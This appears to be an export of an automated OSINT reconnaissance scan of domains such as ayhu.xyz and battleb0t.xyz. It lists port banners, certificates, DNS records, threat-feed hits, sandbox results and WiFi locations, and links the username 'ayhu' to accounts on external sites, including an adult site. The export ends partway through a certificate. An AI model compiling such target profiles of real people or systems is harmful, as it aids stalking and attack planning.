| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.135.9 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Beens Gast (Net ID: 00:01:21:1F:B1:A1) | 52.3759, 4.8975 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5e66a4c91910fb-ORD
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 02:59:54 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | robert@broofa.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://privaterelay.appleid.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 3, u'threat_score': 50, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.scca.com/vdesk/urlfilter_blocked.php3?errorcode=23&v=v2', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3508"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IE_EarlyTabStart_0xa48_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_ConnHashTable<3508>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_db4_IESQMMUTEX_0_519"\n "IsoScope_db4_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.235.135.6:443"\n "169.150.221.147:443"\n "142.250.189.162:443"\n "142.250.72.194:443"\n "142.251.214.136:443"\n "185.199.110.153:443"\n "142.250.191.42:443"\n "157.240.22.25:443"\n "108.139.1.13:443"\n "184.168.104.171:443"\n "142.250.189.226:443"\n "142.250.191.78:443"\n "18.155.202.90:443"\n "172.217.164.99:443"\n "142.251.46.162:443"\n "142.250.189.194:443"\n "142.250.141.156:443"\n "142.250.72.193:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"object.fm"\n "www.scca.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* [http://developers.facebook.com/policy/]. This copyright notice shall be" (Indicator: "facebook.com")\n "* Copyright 2012 Twitter, Inc" (Indicator: "twitter")\n "* Designed and built with all the love in the world @twitter by @mdo and @fat." (Indicator: "twitter")\n "function $E(a){var b=a.state.wpc;if(null!==b&&""!==b)var c=b;else{b=a.state;a=a.win;if(a.google_ad_client)var d=String(a.google_ad_client);else{var e,f,g;if(null!=(g=null!=(f=null==(d=DE(a).head_tag_slot_vars)?void 0:d.google_ad_client)?f:null==(e=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:e.getAttribute("data-ad-client")))d=g;else{c:{d=a.document.getElementsByTagName("script");e=a.navigator&&a.navigator.userAgent||"";e=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube"," (Indicator: "twitter")\n "function hn(a){switch(a){case "true":return!0;case "false":return!1;case "null":return null;case "undefined":break;default:try{var b=a.match(/^(?:\'(.*)\'|"(.*)")$/);if(b)return b[1]||b[2]||"";if(/^[-+]?\\d*(\\.\\d+)?$/.test(a)){var c=parseFloat(a);return c===c?c:void 0}}catch(d){}}};function jn(a){if(a.google_ad_client)return String(a.google_ad_client);var b,c,d,e,f;if(null!=(e=null!=(d=null==(b=X(a).head_tag_slot_vars)?void 0:b.google_ad_client)?d:null==(c=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:c.getAttribute("data-ad-client")))b=e;else{b:{b=a.document.getElementsByTagName("script");a=a.navigator&&a.navigator.userAgent||"";a=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube"," (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2469.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2A0D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab2468.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab23C6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab2B27.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab2A0C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab23D9.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab27F6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab26EB.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab23D8.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "J5LMIWI0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J5LMIWI0.txt]- [targetUID: 00000000-00003508]\n "original_1_.js" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "f_3_.txt" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "SGRF2RQT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SGRF2RQT.txt]- [targetUID: 00000000-00003444]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003444]\n "Tar2469.tmp" has type "data"- Location: [%TEMP%\\Tar2469.tmp]- [targetUID: 00000000-00003444]\n "f_5_.txt" has type "ASCII text with very long lines"- [targetUID: N/A]\n "original_2_.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "aframe_1_.htm" has type "HTML document ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "SQF88PWE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SQF88PWE.txt]- [targetUID: 00000000-00003508]\n "hotjar-1689630_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "modules.6af44455668b675aade1_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_CA5A6E9A-C9CD-11ED-BEC3-08002719F913_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88F42E2F-C9CC-11ED-BEC3-08002719F913_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab2468.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2468.tmp]- [targetUID: 00000000-00003444]\n "panzoom_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "IZGPZZYD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IZGPZZYD.txt]- [targetUID: 00000000-00003508]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DF7EB16B1E041EF79D.TMP" has type "data"- Location: [%TEMP%\\~DF7EB16B1E041EF79D.TMP]- [targetUID: 00000000-00003 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | L1NKSYS (Net ID: 00:0C:41:F6:2E:FE) | 39.0469, -77.4903 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:8080 | 172.67.168.252 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-14n.github.io]
https://www.openphish.com/feed.txt | 0-14n.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | APC (Net ID: 00:09:5B:4F:F1:CA) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:44:22 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.108.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CWhite-Aireconsole (Net ID: 00:02:0C:09:99:E0) | 37.7813933,-122.3918002 |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webmail.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Destructoid (Category: social)
https://www.destructoid.com/?name=ayhu | ayhu |
| 2023-05-12 02:54:23 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/html;charset=utf-8 | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU |
| 2023-05-12 02:54:22 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://www.ayhu.xyz | www.ayhu.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-1AA2 (Net ID: 00:1D:D2:1B:1A:A0) | 32.8608, -79.9746 |
| 2023-05-12 03:10:19 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [188.114.96.0/24]
http://www.voipbl.org/update | 188.114.96.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | XVIDEOS-profiles (Category: XXXPORNXXX)
https://www.xvideos.com/profiles/ayhu | ayhu |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/kappi_1.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:10:04 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | beatrixhaller.at | 207.154.228.167 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 55 2nd PMO (Net ID: 00:01:21:10:61:00) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:53 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:36:85:4f:53:33:b4:86:64:2a:83:12:ed:95:43:fe:1e:22
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 18:58:42 2023 GMT
Not After : Apr 2 18:58:41 2023 GMT
Subject: CN=teamcity.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:a9:1b:77:20:87:f6:da:b4:e6:55:f1:15:61:14:
5d:d5:64:2e:1b:95:d0:fa:42:f5:c5:a3:6e:02:4b:
41:fb:df:35:0c:b5:28:23:7f:95:78:79:7a:ae:1b:
33:21:14:1a:cf:54:dc:ad:7c:ad:0e:d0:0d:13:24:
ac:b2:17:d0:67:2e:56:2e:b6:b0:fc:48:83:bd:01:
86:52:7b:96:4e:60:82:98:48:6b:33:90:dc:af:7a:
0e:ed:26:47:56:e9:2a:9b:55:f7:eb:69:7f:53:8a:
65:d2:d9:9f:8e:b4:d7:c2:d1:e2:bc:27:0e:51:4c:
6a:50:43:bf:f3:eb:93:79:c5:c0:01:20:e4:3f:17:
e9:46:96:6a:c9:c7:d3:3a:19:6a:20:08:fd:61:d6:
98:cf:84:d5:28:4b:ee:2d:d4:11:0b:36:29:51:b8:
23:d5:73:76:da:70:98:bf:4f:33:c0:fe:34:a0:ab:
09:05:a6:dc:26:b2:66:b1:51:b6:f2:4f:d9:92:3a:
c0:21:8b:2a:63:52:83:3f:e9:e2:13:c0:c2:c9:2d:
d5:e5:7e:fd:90:7e:37:42:6b:b9:54:b1:2f:9b:98:
24:d8:0b:1b:69:e7:d3:08:0e:71:57:e8:1a:67:a6:
92:84:48:3f:fc:46:40:41:65:20:38:c9:7e:99:04:
34:72:9a:a0:65:84:01:2f:31:b1:86:06:22:39:91:
0a:ee:bd:30:20:85:c5:8d:5b:4e:77:39:ae:9b:09:
06:f6:07:9d:dd:2d:ba:92:b9:4a:fe:af:b4:b2:6a:
1c:46:10:aa:88:c3:34:ab:7b:51:a7:88:62:ff:6f:
89:37:e0:83:c3:40:7b:7e:a8:e9:d2:e9:e0:68:ff:
51:7e:4a:c3:4d:57:60:55:c2:2c:5e:84:55:31:0d:
f9:06:48:b8:fd:a5:13:e0:6d:e6:16:0e:03:58:98:
01:6a:9c:dd:37:75:36:74:a0:0e:9a:ed:4d:d0:b0:
57:3c:8d:0d:2e:93:98:3c:31:25:01:37:1f:57:7e:
ef:84:b5:c0:04:9b:56:77:f4:78:da:7b:d3:51:11:
80:33:d3:18:83:ee:96:99:02:db:e7:fd:22:71:5a:
7f:e7:e3:95:25:33:c7:56:7f:0d:59:30:dc:3e:03:
7d:f0:6b:ae:f9:f9:7c:ad:ec:ad:62:73:0e:7f:47:
4e:2a:02:fd:df:82:83:00:62:ec:61:18:4d:70:9d:
bd:b9:85:be:c1:ed:b1:f9:61:e0:dc:70:d2:b3:0d:
be:23:ab:b6:3a:43:ae:fe:c3:d3:cf:08:6c:c7:33:
70:eb:d2:70:df:6f:ce:26:37:4c:eb:f9:4f:c2:58:
32:f9:79
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
02:C9:94:28:32:1B:B1:2F:E4:C4:4F:88:0E:4C:57:09:73:5A:37:AF
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:teamcity.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Jan 2 19:58:42.072 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:C3:06:C6:C9:50:41:7A:D7:6C:70:98:
51:7B:09:5D:89:5F:4F:70:26:E1:F3:55:05:EB:4B:EB:
4E:9B:F0:F2:88:02:20:0D:25:66:1C:2B:B5:DD:05:53:
30:99:F3:B4:0E:BD:C7:CD:B0:F0:5C:10:43:36:86:5F:
33:1B:1F:4F:B8:11:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 2 19:58:42.586 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:B0:57:94:1E:8F:52:58:AA:CA:03:15:
81:F7:97:21:F9:28:45:54:DF:F1:77:F6:A5:EC:58:76:
D4:E4:12:AD:72:02:20:01:EE:79:67:15:46:B5:E0:30:
01:5F:EC:EA:1F:02:05:AC:32:1E:71:83:9E:36:A7:78:
3E:88:36:4C:5A:59:65
Signature Algorithm: sha256WithRSAEncryption
00:08:62:12:2d:66:22:5c:b5:95:b3:65:a0:38:13:b2:e8:94:
fc:c1:f0:43:eb:c7:1d:b0:f8:81:fa:e3:8a:ff:5b:71:ba:c9:
f0:8c:f7:2d:1c:f7:06:60:a9:cc:2b:a3:6a:74:56:5c:cc:ee:
dd:59:f1:89:1a:b3:64:77:7a:c3:42:25:ce:6f:ac:00:39:8c:
a8:ce:ab:de:74:9d:af:21:0a:8f:b8:da:c8:3a:34:04:13:53:
15:9a:a4:d4:ed:01:76:22:4f:b2:ec:9f:6d:03:d3:fa:18:6c:
67:6c:d6:b6:ce:7c:21:a4:1d:31:9c:0b:67:28:45:a7:ef:50:
97:79:ef:ba:a7:08:97:43:77:c8:c9:14:ff:92:90:23:36:be:
38:39:aa:a3:93:44:43:ea:01:c8:6f:d8:16:59:02:23:ab:26:
37:6a:12:88:93:b7:fe:c2:0d:03:0c:53:22:d8:37:25:ad:01:
bc:05:a2:c1:63:10:a5:01:dc:4e:2b:3f:07:57:03:2b:c0:d6:
50:e4:e1:65:6d:4b:fd:e0:d9:56:40:77:bf:53:f8:f8:15:43:
95:2f:e5:cc:d5:7e:3a:08:ae:5e:a2:25:e0:3f:95:7a:61:d1:
0e:7f:79:5b:19:24:0a:bf:5f:bd:78:ba:c9:ea:6b:b8:bc:16:
32:d8:03:9b
| battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | logitec-99596f (Net ID: 00:01:8E:99:59:6E) | 50.1188, 8.6843 |
| 2023-05-12 02:50:26 | Legal Entity Identifier | No | GLEIF | 0 | 0 | 3 | 0 | None | 5493007DY18BGNLDWU14 | Cloudflare\, Inc. |
| 2023-05-12 02:53:17 | IP Address | No | Mnemonic PassiveDNS | 117 | 0 | 1 | 0 | None | 87.248.157.102 | ayhu.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | My Wireless Network B (Net ID: 00:02:2D:2C:6D:7E) | 34.0544, -118.244 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Cloud computing providers | cdn-185-199-111-153.github.com |
| 2023-05-12 02:50:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:2c:84:3a:08:10:23:75:f2:8a:d5:a0:cb:cc:f6:da:14:6e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:32:07 2022 GMT
Not After : Mar 27 01:32:06 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
